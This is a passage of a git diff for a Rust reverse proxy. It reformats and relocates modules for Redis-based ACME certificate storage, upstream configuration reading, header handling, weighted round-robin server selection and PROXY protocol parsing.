self + .get_conn() + .await .with_context(|| "Failed to get Redis connection")?; tracing::debug!("Redis connection established"); // Combine cert and chain to create fullchain let mut fullchain = cert.to_vec(); fullchain.extend_from_slice(chain); - tracing::debug!("Combined certificate chain (cert: {} bytes, chain: {} bytes, fullchain: {} bytes)", - cert.len(), chain.len(), fullchain.len()); + tracing::debug!( + "Combined certificate chain (cert: {} bytes, chain: {} bytes, fullchain: {} bytes)", + cert.len(), + chain.len(), + fullchain.len() + ); // Calculate SHA256 hash of fullchain + key for change detection - use sha2::{Sha256, Digest}; + use sha2::{Digest, Sha256}; let mut hasher = Sha256::new(); hasher.update(&fullchain); hasher.update(key); @@ -318,19 +359,43 @@ impl Storage for RedisStorage { for (file_type, content) in live_files.iter() { let live_key = self.live_key(file_type); - tracing::debug!("Writing {} to Redis key: {} ({} bytes)", file_type, live_key, content.len()); - conn.set::<_, _, ()>(&live_key, content).await - .with_context(|| format!("Failed to write live {} to Redis key: {}", file_type, live_key))?; - tracing::debug!("Successfully wrote {} to Redis key: {}", file_type, live_key); + tracing::debug!( + "Writing {} to Redis key: {} ({} bytes)", + file_type, + live_key, + content.len() + ); + conn.set::<_, _, ()>(&live_key, content) + .await + .with_context(|| { + format!( + "Failed to write live {} to Redis key: {}", + file_type, live_key + ) + })?; + tracing::debug!( + "Successfully wrote {} to Redis key: {}", + file_type, + live_key + ); } // Store certificate hash for change detection let hash_key = self.metadata_key("certificate_hash"); - conn.set::<_, _, ()>(&hash_key, &hash).await - .with_context(|| format!("Failed to write certificate hash to Redis key: {}", hash_key))?; + conn.set::<_, _, ()>(&hash_key, &hash) + .await + .with_context(|| { + format!( + "Failed to write certificate hash to Redis key: {}", + hash_key + ) + })?; tracing::debug!("Stored certificate hash: {} at key: {}", hash, hash_key); - tracing::info!("All certificates written successfully to Redis for domain: {}", self.base_key); + tracing::info!( + "All certificates written successfully to Redis for domain: {}", + self.base_key + ); Ok(()) } @@ -347,7 +412,9 @@ impl Storage for RedisStorage { async fn read_created_at(&self) -> Result> { let mut conn = self.get_conn().await?; let key = self.metadata_key("created_at"); - let content: String = conn.get(&key).await + let content: String = conn + .get(&key) + .await .with_context(|| format!("Failed to read created_at from Redis key: {}", key))?; content .parse::>() @@ -357,7 +424,8 @@ impl Storage for RedisStorage { async fn write_created_at(&self, created_at: chrono::DateTime) -> Result<()> { let mut conn = self.get_conn().await?; let key = self.metadata_key("created_at"); - conn.set::<_, _, ()>(&key, created_at.to_string()).await + conn.set::<_, _, ()>(&key, created_at.to_string()) + .await .with_context(|| format!("Failed to write created_at to Redis key: {}", key))?; Ok(()) } @@ -366,20 +434,34 @@ impl Storage for RedisStorage { // Store challenge token in Redis let mut conn = self.get_conn().await?; let challenge_key = self.challenge_key(token); - conn.set::<_, _, ()>(&challenge_key, key_auth).await - .with_context(|| format!("Failed to write challenge token to Redis key: {}", challenge_key))?; + conn.set::<_, _, ()>(&challenge_key, key_auth) + .await + .with_context(|| { + format!( + "Failed to write challenge token to Redis key: {}", + challenge_key + ) + })?; // Store challenge timestamp let timestamp = chrono::Utc::now(); let timestamp_key = format!("{}:timestamp", challenge_key); - conn.set::<_, _, ()>(×tamp_key, timestamp.to_rfc3339()).await - .with_context(|| format!("Failed to write challenge timestamp to Redis key: {}", timestamp_key))?; + conn.set::<_, _, ()>(×tamp_key, timestamp.to_rfc3339()) + .await + .with_context(|| { + format!( + "Failed to write challenge timestamp to Redis key: {}", + timestamp_key + ) + })?; // Also write to filesystem for HTTP-01 challenge serving // The HTTP server needs to serve these files // Write challenge files to a shared location (not per-domain) // This allows the HTTP server to serve them from a single base path - let base_path = self.static_path.parent() + let base_path = self + .static_path + .parent() .ok_or_else(|| anyhow!("Cannot get parent path from static_path"))? .to_path_buf(); @@ -387,13 +469,23 @@ impl Storage for RedisStorage { well_known_folder.push("well-known"); tokio::fs::create_dir_all(&well_known_folder) .await - .with_context(|| format!("Failed to create well-known directory {:?}", well_known_folder))?; + .with_context(|| { + format!( + "Failed to create well-known directory {:?}", + well_known_folder + ) + })?; let mut challenge_path = well_known_folder.clone(); challenge_path.push("acme-challenge"); tokio::fs::create_dir_all(&challenge_path) .await - .with_context(|| format!("Failed to create acme-challenge directory {:?}", challenge_path))?; + .with_context(|| { + format!( + "Failed to create acme-challenge directory {:?}", + challenge_path + ) + })?; challenge_path.push(token); tokio::fs::write(&challenge_path, key_auth) @@ -417,7 +509,12 @@ impl Storage for RedisStorage { None } - async fn write_dns_challenge(&self, _domain: &str, dns_record: &str, dns_value: &str) -> Result<()> { + async fn write_dns_challenge( + &self, + _domain: &str, + dns_record: &str, + dns_value: &str, + ) -> Result<()> { // Store DNS challenge code in Redis let mut conn = self.get_conn().await?; let dns_key = self.dns_challenge_key(); @@ -428,16 +525,27 @@ impl Storage for RedisStorage { "challenge_code": dns_value, }); - conn.set::<_, _, ()>(&dns_key, challenge_data.to_string()).await + conn.set::<_, _, ()>(&dns_key, challenge_data.to_string()) + .await .with_context(|| format!("Failed to write DNS challenge to Redis key: {}", dns_key))?; // Store DNS challenge timestamp let timestamp = chrono::Utc::now(); let timestamp_key = format!("{}:timestamp", dns_key); - conn.set::<_, _, ()>(×tamp_key, timestamp.to_rfc3339()).await - .with_context(|| format!("Failed to write DNS challenge timestamp to Redis key: {}", timestamp_key))?; - - tracing::info!("DNS challenge code saved to Redis: {} = {}", dns_record, dns_value); + conn.set::<_, _, ()>(×tamp_key, timestamp.to_rfc3339()) + .await + .with_context(|| { + format!( + "Failed to write DNS challenge timestamp to Redis key: {}", + timestamp_key + ) + })?; + + tracing::info!( + "DNS challenge code saved to Redis: {} = {}", + dns_record, + dns_value + ); Ok(()) } @@ -445,14 +553,18 @@ impl Storage for RedisStorage { let mut conn = self.get_conn().await?; // Use a shared key for account credentials (not per-domain) // Get prefix from RedisManager if available - let prefix = crate::redis::RedisManager::get() + let prefix = crate::storage::redis::RedisManager::get() .map(|rm| rm.get_prefix().to_string()) .unwrap_or_else(|_| "ssl-storage".to_string()); let creds_key = format!("{}:acme:account_credentials", prefix); let creds_key_clone = creds_key.clone(); - let result: Option = conn.get(&creds_key).await - .with_context(|| format!("Failed to read account credentials from Redis key: {}", creds_key_clone))?; + let result: Option = conn.get(&creds_key).await.with_context(|| { + format!( + "Failed to read account credentials from Redis key: {}", + creds_key_clone + ) + })?; Ok(result) } @@ -461,14 +573,20 @@ impl Storage for RedisStorage { let mut conn = self.get_conn().await?; // Use a shared key for account credentials (not per-domain) // Get prefix from RedisManager if available - let prefix = crate::redis::RedisManager::get() + let prefix = crate::storage::redis::RedisManager::get() .map(|rm| rm.get_prefix().to_string()) .unwrap_or_else(|_| "ssl-storage".to_string()); let creds_key = format!("{}:acme:account_credentials", prefix); let creds_key_clone = creds_key.clone(); - conn.set::<_, _, ()>(&creds_key, credentials).await - .with_context(|| format!("Failed to write account credentials to Redis key: {}", creds_key_clone))?; + conn.set::<_, _, ()>(&creds_key, credentials) + .await + .with_context(|| { + format!( + "Failed to write account credentials to Redis key: {}", + creds_key_clone + ) + })?; Ok(()) } @@ -489,12 +607,21 @@ impl Storage for RedisStorage { "count": new_count, }); - conn.set::<_, _, ()>(&failure_key, failure_data.to_string()).await - .with_context(|| format!("Failed to write failure record to Redis key: {}", failure_key))?; + conn.set::<_, _, ()>(&failure_key, failure_data.to_string()) + .await + .with_context(|| { + format!( + "Failed to write failure record to Redis key: {}", + failure_key + ) + })?; // Write failure count - conn.set::<_, _, ()>(&count_key, new_count.to_string()).await - .with_context(|| format!("Failed to write failure count to Redis key: {}", count_key))?; + conn.set::<_, _, ()>(&count_key, new_count.to_string()) + .await + .with_context(|| { + format!("Failed to write failure count to Redis key: {}", count_key) + })?; Ok(()) } @@ -503,8 +630,12 @@ impl Storage for RedisStorage { let mut conn = self.get_conn().await?; let failure_key = self.metadata_key("cert_failure"); - let content: Option = conn.get(&failure_key).await - .with_context(|| format!("Failed to read failure record from Redis key: {}", failure_key))?; + let content: Option = conn.get(&failure_key).await.with_context(|| { + format!( + "Failed to read failure record from Redis key: {}", + failure_key + ) + })?; let content = match content { Some(c) => c, @@ -544,8 +675,9 @@ impl Storage for RedisStorage { let mut conn = self.get_conn().await?; let count_key = self.metadata_key("cert_failure_count"); - let count: Option = conn.get(&count_key).await - .with_context(|| format!("Failed to read failure count from Redis key: {}", count_key))?; + let count: Option = conn.get(&count_key).await.with_context(|| { + format!("Failed to read failure count from Redis key: {}", count_key) + })?; let count = match count { Some(c) => c.trim().parse::().unwrap_or(0), @@ -560,8 +692,12 @@ impl Storage for RedisStorage { let hash_key = self.metadata_key("certificate_hash"); // Check if hash exists - let hash: Option = conn.get(&hash_key).await - .with_context(|| format!("Failed to read certificate hash from Redis key: {}", hash_key))?; + let hash: Option = conn.get(&hash_key).await.with_context(|| { + format!( + "Failed to read certificate hash from Redis key: {}", + hash_key + ) + })?; if let Some(hash) = hash { return Ok(Some(hash)); @@ -577,26 +713,39 @@ impl Storage for RedisStorage { let key = self.read_key().await?; // Calculate SHA256 hash of fullchain + key - use sha2::{Sha256, Digest}; + use sha2::{Digest, Sha256}; let mut hasher = Sha256::new(); hasher.update(&fullchain); hasher.update(&key); let hash = format!("{:x}", hasher.finalize()); // Store the hash for future use - conn.set::<_, _, ()>(&hash_key, &hash).await - .with_context(|| format!("Failed to write certificate hash to Redis key: {}", hash_key))?; + conn.set::<_, _, ()>(&hash_key, &hash) + .await + .with_context(|| { + format!( + "Failed to write certificate hash to Redis key: {}", + hash_key + ) + })?; Ok(Some(hash)) } - async fn get_challenge_timestamp(&self, token: &str) -> Result>> { + async fn get_challenge_timestamp( + &self, + token: &str, + ) -> Result>> { let mut conn = self.get_conn().await?; let challenge_key = self.challenge_key(token); let timestamp_key = format!("{}:timestamp", challenge_key); - let content: Option = conn.get(×tamp_key).await - .with_context(|| format!("Failed to read challenge timestamp from Redis key: {}", timestamp_key))?; + let content: Option = conn.get(×tamp_key).await.with_context(|| { + format!( + "Failed to read challenge timestamp from Redis key: {}", + timestamp_key + ) + })?; let content = match content { Some(c) => c, @@ -610,13 +759,20 @@ impl Storage for RedisStorage { Ok(Some(timestamp)) } - async fn get_dns_challenge_timestamp(&self, _domain: &str) -> Result>> { + async fn get_dns_challenge_timestamp( + &self, + _domain: &str, + ) -> Result>> { let mut conn = self.get_conn().await?; let dns_key = self.dns_challenge_key(); let timestamp_key = format!("{}:timestamp", dns_key); - let content: Option = conn.get(×tamp_key).await - .with_context(|| format!("Failed to read DNS challenge timestamp from Redis key: {}", timestamp_key))?; + let content: Option = conn.get(×tamp_key).await.with_context(|| { + format!( + "Failed to read DNS challenge timestamp from Redis key: {}", + timestamp_key + ) + })?; let content = match content { Some(c) => c, @@ -660,9 +816,13 @@ impl Storage for RedisStorage { let mut conn = self.get_conn().await?; // Get all challenge keys matching the pattern - let challenge_pattern = format!("{}:challenge:*", self.base_key); - let keys: Vec = conn.keys(&challenge_pattern).await - .with_context(|| format!("Failed to get challenge keys matching {}", challenge_pattern))?; + let challenge_pattern = format!("{}:challenge:*", escape_redis_pattern(&self.base_key)); + let keys: Vec = conn.keys(&challenge_pattern).await.with_context(|| { + format!( + "Failed to get challenge keys matching {}", + challenge_pattern + ) + })?; for challenge_key in keys { // Skip timestamp keys @@ -686,4 +846,3 @@ impl Storage for RedisStorage { Ok(()) } } - diff --git a/src/acme/upstreams_reader.rs b/src/proxy/acme/upstreams_reader.rs similarity index 89% rename from src/acme/upstreams_reader.rs rename to src/proxy/acme/upstreams_reader.rs index 92619c0..a1929f9 100644 --- a/src/acme/upstreams_reader.rs +++ b/src/proxy/acme/upstreams_reader.rs @@ -1,11 +1,11 @@ //! Domain reader that reads domains from upstreams.yaml configuration +use crate::proxy::acme::domain_reader::{DomainConfig, DomainReader}; use anyhow::{Context, Result}; -use crate::acme::domain_reader::{DomainConfig, DomainReader}; +use serde::{Deserialize, Serialize}; use std::path::PathBuf; use std::sync::Arc; use tokio::sync::RwLock; -use serde::{Deserialize, Serialize}; #[derive(Debug, Clone, Serialize, Deserialize)] pub struct UpstreamsAcmeConfig { @@ -46,11 +46,14 @@ impl UpstreamsDomainReader { let mut domains = Vec::new(); // Read and parse upstreams.yaml directly to get ACME config - let yaml_content = tokio::fs::read_to_string(&self.upstreams_path).await + let yaml_content = tokio::fs::read_to_string(&self.upstreams_path) + .await .with_context(|| format!("Failed to read upstreams file: {:?}", self.upstreams_path))?; let parsed: crate::utils::structs::Config = serde_yaml::from_str(&yaml_content) - .with_context(|| format!("Failed to parse upstreams YAML: {:?}", self.upstreams_path))?; + .with_context(|| { + format!("Failed to parse upstreams YAML: {:?}", self.upstreams_path) + })?; if let Some(upstreams) = &parsed.upstreams { for (hostname, host_config) in upstreams { @@ -60,7 +63,11 @@ impl UpstreamsDomainReader { } let is_wildcard = hostname.starts_with("*."); - let acme_wildcard = host_config.acme.as_ref().map(|a| a.wildcard).unwrap_or(false); + let acme_wildcard = host_config + .acme + .as_ref() + .map(|a| a.wildcard) + .unwrap_or(false); // Determine challenge type from ACME config or auto-detect let challenge_type = if let Some(acme_config) = &host_config.acme { @@ -73,7 +80,10 @@ impl UpstreamsDomainReader { // Determine email from ACME config or use global let email = if let Some(acme_config) = &host_config.acme { - acme_config.email.clone().or_else(|| self.global_email.clone()) + acme_config + .email + .clone() + .or_else(|| self.global_email.clone()) } else { self.global_email.clone() }; @@ -137,4 +147,3 @@ impl DomainReader for UpstreamsDomainReader { Ok(domains) } } - diff --git a/src/http_proxy/bgservice.rs b/src/proxy/bgservice.rs similarity index 64% rename from src/http_proxy/bgservice.rs rename to src/proxy/bgservice.rs index 1a8a03a..530e4e8 100644 --- a/src/http_proxy/bgservice.rs +++ b/src/proxy/bgservice.rs @@ -1,9 +1,10 @@ -use crate::utils::discovery::{APIUpstreamProvider, Discovery, FromFileProvider}; +use crate::proxy::proxyhttp::LB; +use crate::storage::redis::RedisManager; +use crate::utils::discovery::{Discovery, FromFileProvider}; +use crate::utils::healthcheck; use crate::utils::parceyaml::load_configuration; use crate::utils::structs::Configuration; -use crate::utils::healthcheck; -use crate::http_proxy::proxyhttp::LB; -use crate::worker::certificate::{request_certificate_from_acme, get_acme_config}; +use crate::worker::certificate::{get_acme_config, request_certificate_from_acme}; use async_trait::async_trait; use dashmap::DashMap; use futures::channel::mpsc; @@ -12,14 +13,12 @@ use log::{debug, error, info, warn}; use pingora_core::server::ShutdownWatch; use pingora_core::services::background::BackgroundService; use std::sync::Arc; -use crate::redis::RedisManager; #[async_trait] impl BackgroundService for LB { async fn start(&self, mut shutdown: ShutdownWatch) { info!("Starting Pingora background service for upstreams management"); let (mut tx, mut rx) = mpsc::channel::(1); - let tx_api = tx.clone(); // Skip if no upstreams config file is provided (e.g., when using new config format) if self.config.upstreams_conf.is_empty() { @@ -27,21 +26,32 @@ impl BackgroundService for LB { return; } - info!("Loading upstreams configuration from: {}", self.config.upstreams_conf); - let config = match load_configuration(self.config.upstreams_conf.clone().as_str(), "filepath").await { - Some(cfg) => { - info!("Upstreams configuration loaded successfully"); - cfg - }, - None => { - error!("Failed to load upstreams configuration from: {}", self.config.upstreams_conf); - return; - } - }; + info!( + "Loading upstreams configuration from: {}", + self.config.upstreams_conf + ); + let config = + match load_configuration(self.config.upstreams_conf.clone().as_str(), "filepath").await + { + Some(cfg) => { + info!("Upstreams configuration loaded successfully"); + cfg + } + None => { + error!( + "Failed to load upstreams configuration from: {}", + self.config.upstreams_conf + ); + return; + } + }; match config.typecfg.as_str() { "file" => { - info!("Running File discovery, requested type is: {}", config.typecfg); + info!( + "Running File discovery, requested type is: {}", + config.typecfg + ); tx.send(config).await.unwrap(); let file_load = FromFileProvider { path: self.config.upstreams_conf.clone(), @@ -53,20 +63,11 @@ impl BackgroundService for LB { } } - let api_load = APIUpstreamProvider { - address: self.config.config_address.clone(), - masterkey: self.config.master_key.clone(), - config_api_enabled: self.config.config_api_enabled.clone(), - tls_address: self.config.config_tls_address.clone(), - tls_certificate: self.config.config_tls_certificate.clone(), - tls_key_file: self.config.config_tls_key_file.clone(), - file_server_address: self.config.file_server_address.clone(), - file_server_folder: self.config.file_server_folder.clone(), - }; - let _ = tokio::spawn(async move { api_load.start(tx_api).await }); - // Use AppConfig values as defaults - let (default_healthcheck_method, default_healthcheck_interval) = (self.config.healthcheck_method.clone(), self.config.healthcheck_interval); + let (default_healthcheck_method, default_healthcheck_interval) = ( + self.config.healthcheck_method.clone(), + self.config.healthcheck_interval, + ); let mut healthcheck_method = default_healthcheck_method.clone(); let mut healthcheck_interval = default_healthcheck_interval; let mut healthcheck_started = false; @@ -100,12 +101,12 @@ impl BackgroundService for LB { healthcheck_started = true; } - // Update arxignis_paths (global paths that work across all hostnames) - self.arxignis_paths.clear(); - for entry in ss.arxignis_paths.iter() { + // Update internal_paths (global paths that work across all hostnames) + self.internal_paths.clear(); + for entry in ss.internal_paths.iter() { let (servers, counter) = entry.value(); let new_counter = std::sync::atomic::AtomicUsize::new(counter.load(std::sync::atomic::Ordering::Relaxed)); - self.arxignis_paths.insert(entry.key().clone(), (servers.clone(), new_counter)); + self.internal_paths.insert(entry.key().clone(), (servers.clone(), new_counter)); } crate::utils::tools::clone_dashmap_into(&ss.upstreams, &self.ump_full); @@ -117,8 +118,33 @@ impl BackgroundService for LB { new.authentication = ss.extraparams.authentication.clone(); new.rate_limit = ss.extraparams.rate_limit; self.extraparams.store(Arc::new(new)); - self.headers.clear(); + // Update global request and response headers + self.global_request_headers.store(Arc::new(ss.global_request_headers.clone())); + self.global_response_headers.store(Arc::new(ss.global_response_headers.clone())); + info!("Updated global headers: {} request headers, {} response headers", + ss.global_request_headers.len(), ss.global_response_headers.len()); + + // Update path-level headers (separated into request and response) + self.request_headers.clear(); + self.response_headers.clear(); + + // Copy request headers + for entry in ss.request_headers.iter() { + let hostname = entry.key().clone(); + let path_headers = entry.value().clone(); + self.request_headers.insert(hostname, path_headers); + } + + // Copy response headers + for entry in ss.response_headers.iter() { + let hostname = entry.key().clone(); + let path_headers = entry.value().clone(); + self.response_headers.insert(hostname, path_headers); + } + + // Legacy: keep old headers for backward compatibility + self.headers.clear(); for entry in ss.upstreams.iter() { let global_key = entry.key().clone(); let global_values = DashMap::new(); @@ -131,11 +157,8 @@ impl BackgroundService for LB { let path_key = path.key().clone(); let path_headers = path.value().clone(); self.headers.insert(path_key.clone(), path_headers); - if let Some(global_headers) = ss.headers.get("GLOBAL_HEADERS") { - if let Some(existing_headers) = self.headers.get(&path_key) { - crate::utils::tools::merge_headers(existing_headers.value(), &global_headers); - } - } + // Note: Global headers are now handled separately via global_request_headers + // and global_response_headers, so we don't merge GLOBAL_HEADERS here anymore } // Update upstreams certificate mappings @@ -160,9 +183,11 @@ impl BackgroundService for LB { } } - /// Check certificates for domains in upstreams and request from ACME if missing -async fn check_and_request_certificates_for_upstreams(upstreams: &crate::utils::structs::UpstreamsDashMap, upstreams_path: &str) { +async fn check_and_request_certificates_for_upstreams( + upstreams: &crate::utils::structs::UpstreamsDashMap, + upstreams_path: &str, +) { // Check if ACME is enabled let _acme_config = match get_acme_config().await { Some(config) if config.enabled => config, @@ -174,18 +199,25 @@ async fn check_and_request_certificates_for_upstreams(upstreams: &crate::utils:: // Read upstreams.yaml to check which domains need certificates use serde_yaml; - let parsed: Option = if let Ok(yaml_content) = tokio::fs::read_to_string(upstreams_path).await { - serde_yaml::from_str(&yaml_content).ok() - } else { - warn!("Failed to read upstreams file: {}, skipping certificate checks", upstreams_path); - None - }; + let parsed: Option = + if let Ok(yaml_content) = tokio::fs::read_to_string(upstreams_path).await { + serde_yaml::from_str(&yaml_content).ok() + } else { + warn!( + "Failed to read upstreams file: {}, skipping certificate checks", + upstreams_path + ); + None + }; // Get Redis manager to check for existing certificates let redis_manager = match RedisManager::get() { Ok(rm) => rm, Err(e) => { - warn!("Redis manager not available, skipping certificate check for upstreams: {}", e); + warn!( + "Redis manager not available, skipping certificate check for upstreams: {}", + e + ); return; } }; @@ -216,7 +248,10 @@ async fn check_and_request_certificates_for_upstreams(upstreams: &crate::utils:: }; if !needs_cert { - debug!("Skipping certificate check for domain {} (no ACME config and ssl_enabled: false)", domain); + debug!( + "Skipping certificate check for domain {} (no ACME config and ssl_enabled: false)", + domain + ); continue; } @@ -233,20 +268,35 @@ async fn check_and_request_certificates_for_upstreams(upstreams: &crate::utils:: { Ok(exists) => exists, Err(e) => { - warn!("Failed to check certificate existence for domain {}: {}", domain, e); + warn!( + "Failed to check certificate existence for domain {}: {}", + domain, e + ); continue; } }; // Certificate doesn't exist, request from ACME if cert_exists == 0 { - info!("Certificate not found in Redis for domain: {}, requesting from ACME", domain); + info!( + "Certificate not found in Redis for domain: {}, requesting from ACME", + domain + ); // Use a placeholder certificate path (will be stored in Redis) - let certificate_path = format!("/tmp/synapse-certs/{}", normalized_domain.replace('.', "_")); - if let Err(e) = request_certificate_from_acme(domain, normalized_domain, &certificate_path).await { - warn!("Failed to request certificate from ACME for domain {}: {}", domain, e); + let certificate_path = + format!("/tmp/synapse-certs/{}", normalized_domain.replace('.', "_")); + if let Err(e) = + request_certificate_from_acme(domain, normalized_domain, &certificate_path).await + { + warn!( + "Failed to request certificate from ACME for domain {}: {}", + domain, e + ); } else { - info!("Successfully requested certificate from ACME for domain: {}", domain); + info!( + "Successfully requested certificate from ACME for domain: {}", + domain + ); } } else { info!("Certificate already exists in Redis for domain: {}", domain); diff --git a/src/http_proxy/gethosts.rs b/src/proxy/gethosts.rs similarity index 53% rename from src/http_proxy/gethosts.rs rename to src/proxy/gethosts.rs index 1ef3060..4e5097d 100644 --- a/src/http_proxy/gethosts.rs +++ b/src/proxy/gethosts.rs @@ -1,13 +1,54 @@ +use crate::proxy::proxyhttp::LB; use crate::utils::structs::InnerMap; -use crate::http_proxy::proxyhttp::LB; use async_trait::async_trait; -use std::sync::atomic::Ordering; use log::debug; +use std::sync::atomic::Ordering; + +/// Select a server from a list using weighted round-robin algorithm +/// Based on Pingora's Weighted selection approach +fn select_weighted_server( + servers: &[InnerMap], + index: &std::sync::atomic::AtomicUsize, +) -> Option { + if servers.is_empty() { + return None; + } + + // Check if all servers have weight 1 (equal weights = simple round-robin) + let all_equal_weight = servers.iter().all(|s| s.weight == 1); + + if all_equal_weight { + // Simple round-robin for equal weights + let idx = index.fetch_add(1, Ordering::Relaxed) % servers.len(); + return Some(servers[idx].clone()); + } + + // Build weighted array: each server appears weight times + // This is the same approach as Pingora's Weighted algorithm + let mut weighted_indices = Vec::new(); + for (idx, server) in servers.iter().enumerate() { + let weight = server.weight.max(1); // Ensure weight is at least 1 + for _ in 0..weight { + weighted_indices.push(idx); + } + } + + if weighted_indices.is_empty() { + return None; + } + + // Use round-robin on the weighted array + let weighted_idx = index.fetch_add(1, Ordering::Relaxed) % weighted_indices.len(); + let server_idx = weighted_indices[weighted_idx]; + Some(servers[server_idx].clone()) +} #[async_trait] pub trait GetHost { fn get_host(&self, peer: &str, path: &str, backend_id: Option<&str>) -> Option; - fn get_header(&self, peer: &str, path: &str) -> Option>; + fn get_header(&self, peer: &str, path: &str) -> Option>; // Legacy: kept for backward compatibility + fn get_request_headers(&self, peer: &str, path: &str) -> Option>; + fn get_response_headers(&self, peer: &str, path: &str) -> Option>; } #[async_trait] impl GetHost for LB { @@ -19,20 +60,22 @@ impl GetHost for LB { } } - // Check arxignis_paths first - these paths work regardless of hostname + // Check internal_paths first - these paths work regardless of hostname // Try exact match first - if let Some(arxignis_path_entry) = self.arxignis_paths.get(path) { - let (servers, index) = arxignis_path_entry.value(); - if !servers.is_empty() { - let idx = index.fetch_add(1, Ordering::Relaxed) % servers.len(); - debug!("Using Gen0Sec path {} -> {}", path, servers[idx].address); - return Some(servers[idx].clone()); + if let Some(internal_path_entry) = self.internal_paths.get(path) { + let (servers, index) = internal_path_entry.value(); + if let Some(selected) = select_weighted_server(servers, index) { + debug!( + "Using internal path {} -> {} (weight: {})", + path, selected.address, selected.weight + ); + return Some(selected); } } // If no exact match, try prefix/wildcard matching - check if any configured path is a prefix of the request path // Collect all matches and use the longest one (most specific match) let mut best_match: Option<(String, InnerMap, usize)> = None; - for entry in self.arxignis_paths.iter() { + for entry in self.internal_paths.iter() { let pattern = entry.key(); // Handle wildcard patterns ending with /* - strip the /* for matching let (pattern_prefix, is_wildcard) = if pattern.ends_with("/*") { @@ -63,12 +106,13 @@ impl GetHost for LB { if is_valid_match { let (servers, index) = entry.value(); - if !servers.is_empty() { - let idx = index.fetch_add(1, Ordering::Relaxed) % servers.len(); - let matched_server = servers[idx].clone(); + if let Some(matched_server) = select_weighted_server(servers, index) { let prefix_len = pattern_prefix.len(); // Keep the longest (most specific) match based on the prefix length - if best_match.as_ref().map_or(true, |(_, _, best_len)| prefix_len > *best_len) { + if best_match + .as_ref() + .map_or(true, |(_, _, best_len)| prefix_len > *best_len) + { best_match = Some((pattern.clone(), matched_server, prefix_len)); } } @@ -76,18 +120,23 @@ impl GetHost for LB { } } if let Some((pattern, server, _)) = best_match { - debug!("Using Gen0Sec path pattern {} -> {} (matched path: {})", pattern, server.address, path); + debug!( + "Using internal path pattern {} -> {} (matched path: {})", + pattern, server.address, path + ); return Some(server); } // If no prefix match, try progressively shorter paths (same logic as regular upstreams) let mut current_path = path.to_string(); loop { - if let Some(arxignis_path_entry) = self.arxignis_paths.get(¤t_path) { - let (servers, index) = arxignis_path_entry.value(); - if !servers.is_empty() { - let idx = index.fetch_add(1, Ordering::Relaxed) % servers.len(); - debug!("Using Gen0Sec path {} -> {} (matched from {})", current_path, servers[idx].address, path); - return Some(servers[idx].clone()); + if let Some(internal_path_entry) = self.internal_paths.get(¤t_path) { + let (servers, index) = internal_path_entry.value(); + if let Some(selected) = select_weighted_server(servers, index) { + debug!( + "Using internal path {} -> {} (weight: {}, matched from {})", + current_path, selected.address, selected.weight, path + ); + return Some(selected); } } if let Some(pos) = current_path.rfind('/') { @@ -103,9 +152,8 @@ impl GetHost for LB { loop { if let Some(entry) = host_entry.get(¤t_path) { let (servers, index) = entry.value(); - if !servers.is_empty() { - let idx = index.fetch_add(1, Ordering::Relaxed) % servers.len(); - best_match = Some(servers[idx].clone()); + if let Some(selected) = select_weighted_server(servers, index) { + best_match = Some(selected); break; } } @@ -118,9 +166,8 @@ impl GetHost for LB { if best_match.is_none() { if let Some(entry) = host_entry.get("/") { let (servers, index) = entry.value(); - if !servers.is_empty() { - let idx = index.fetch_add(1, Ordering::Relaxed) % servers.len(); - best_match = Some(servers[idx].clone()); + if let Some(selected) = select_weighted_server(servers, index) { + best_match = Some(selected); } } } @@ -128,7 +175,39 @@ impl GetHost for LB { best_match } fn get_header(&self, peer: &str, path: &str) -> Option> { - let host_entry = self.headers.get(peer)?; + // Legacy: kept for backward compatibility, returns request headers + self.get_request_headers(peer, path) + } + + fn get_request_headers(&self, peer: &str, path: &str) -> Option> { + let host_entry = self.request_headers.get(peer)?; + let mut current_path = path.to_string(); + let mut best_match: Option> = None; + loop { + if let Some(entry) = host_entry.get(¤t_path) { + if !entry.value().is_empty() { + best_match = Some(entry.value().clone()); + break; + } + } + if let Some(pos) = current_path.rfind('/') { + current_path.truncate(pos); + } else { + break; + } + } + if best_match.is_none() { + if let Some(entry) = host_entry.get("/") { + if !entry.value().is_empty() { + best_match = Some(entry.value().clone()); + } + } + } + best_match + } + + fn get_response_headers(&self, peer: &str, path: &str) -> Option> { + let host_entry = self.response_headers.get(peer)?; let mut current_path = path.to_string(); let mut best_match: Option> = None; loop { diff --git a/src/http_proxy.rs b/src/proxy/mod.rs similarity index 65% rename from src/http_proxy.rs rename to src/proxy/mod.rs index 6172525..de633ab 100644 --- a/src/http_proxy.rs +++ b/src/proxy/mod.rs @@ -1,5 +1,6 @@ +pub mod acme; pub mod bgservice; pub mod gethosts; +pub mod proxy_protocol; pub mod proxyhttp; pub mod start; -pub mod webserver; diff --git a/src/proxy_protocol.rs b/src/proxy/proxy_protocol.rs similarity index 78% rename from src/proxy_protocol.rs rename to src/proxy/proxy_protocol.rs index bf556be..49093b4 100644 --- a/src/proxy_protocol.rs +++ b/src/proxy/proxy_protocol.rs @@ -1,10 +1,10 @@ +use anyhow::Result; +use bytes::{Buf, Bytes}; +use proxy_protocol::{ProxyHeader, parse}; use std::net::SocketAddr; use std::time::Duration; -use anyhow::Result; use tokio::io::{AsyncRead, AsyncReadExt, AsyncWrite, BufReader}; use tokio::time::timeout; -use proxy_protocol::{ProxyHeader, parse}; -use bytes::{Bytes, Buf}; /// Information extracted from PROXY protocol header #[derive(Debug, Clone)] @@ -29,7 +29,10 @@ pub async fn parse_proxy_protocol_buffered( where R: AsyncRead + Unpin, { - log::trace!("Starting PROXY protocol parse with {}ms timeout", timeout_ms); + log::trace!( + "Starting PROXY protocol parse with {}ms timeout", + timeout_ms + ); let mut reader = BufReader::with_capacity(512, stream); let timeout_duration = Duration::from_millis(timeout_ms); @@ -123,63 +126,65 @@ where if info.is_some() { log::trace!("PROXY protocol parsing successful"); } else { - log::trace!("PROXY protocol parsing completed: no header found, treating as plain connection"); + log::trace!( + "PROXY protocol parsing completed: no header found, treating as plain connection" + ); } Ok((info, reader)) - }, + } Ok(Err(e)) => { log::warn!("PROXY protocol parsing error: {}", e); Err(e) - }, + } Err(_) => { log::warn!("PROXY protocol parsing timeout after {}ms", timeout_ms); Err(anyhow::anyhow!("PROXY protocol parsing timeout")) - }, + } } } /// Convert ProxyHeader to ProxyInfo fn header_to_proxy_info(header: ProxyHeader) -> Option { match header { - ProxyHeader::Version1 { addresses } => { - match addresses { - proxy_protocol::version1::ProxyAddresses::Ipv4 { source, destination } => { - Some(ProxyInfo { - source_addr: SocketAddr::V4(source), - dest_addr: SocketAddr::V4(destination), - version: ProxyVersion::V1, - }) - 